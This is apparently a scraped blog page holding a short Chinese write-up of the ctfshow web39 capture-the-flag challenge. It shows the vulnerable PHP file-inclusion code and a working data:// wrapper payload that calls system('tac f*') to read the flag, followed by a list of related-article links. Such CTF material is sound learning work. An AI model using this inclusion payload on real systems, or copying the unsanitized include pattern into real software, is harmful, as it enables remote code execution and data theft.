当前位置: 首页 > news >正文

ctfshow web39

news 2026/6/13 5:32:43 
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*///flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){include($c.".php");}}else{highlight_file(__FILE__);
}

data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用,当然如果你要是担心的话可以在代码的最后加一个//将自动拼接的.php给注释掉也行

<font style="color:rgb(33, 37, 41);">?c=data://text/plain,<?= system('tac%20f*');?>//</font>(这里的//注释符加不加都无所谓)

http://www.gsyq.cn/news/8074.html

相关文章:

  • 国标GB28181视频平台EasyGBS核心功能解密:如何实现海量设备的录像精准检索与高效回放?
  • 行程长度编码
  • mysql 虚拟列,可以简化 SQL 逻辑、提升查询效率
  • 多站点的TSP问题求解-06 - jack
  • C# CAN通信上位机系统设计与实现
  • 进程池VS线程池
  • python+Django开发笔记(结合禅道开发测试报告)
  • Questions about learning Symfony
  • ctfshow web22(子域名爆破)
  • PLC中的运动控制 - (一)轴
  • ctfshow web23(代码审计编写脚本爆破)
  • 完整教程:ARM指令集总结
  • 封神台 第二章:遇到阻难!绕过WAF过滤
  • uniGUI:在Linux上部署独立应用为服务
  • 一行命令查看docker所有网络 + 子网
  • Salesforce 管理员:是终点,还是跳板?
  • 2025CCPC邀请赛(南昌)VP(A,B,C,D,G,H,K,L)
  • vLLM常用参数解释
  • k8s学习笔记8——Service
  • 读书笔记:索引组织表(IOT):让数据库查询飞起来的黑科技
  • Docker是什么?最全Docker使用教程(小白到高手) - 实践
  • 408学习之c语言(结构体) - 教程
  • TDMQ CKafka 版客户端实战指南系列之一:生产最佳实践
  • 完整教程:MySQL并发问题解析
  • 从“被动监控”到“主动优化”:MyEMS 重构能源管理价值的路径
  • 为什么企业需要高防IP - 详解
  • 论文解读-《Graph Retrieval-Augmented Generation A Survey》 - zhang
  • AI编程问题处理与传统网页搜索对比分析
  • WPF Canvas 网格线背景样式
  • 常见开源安全工具列表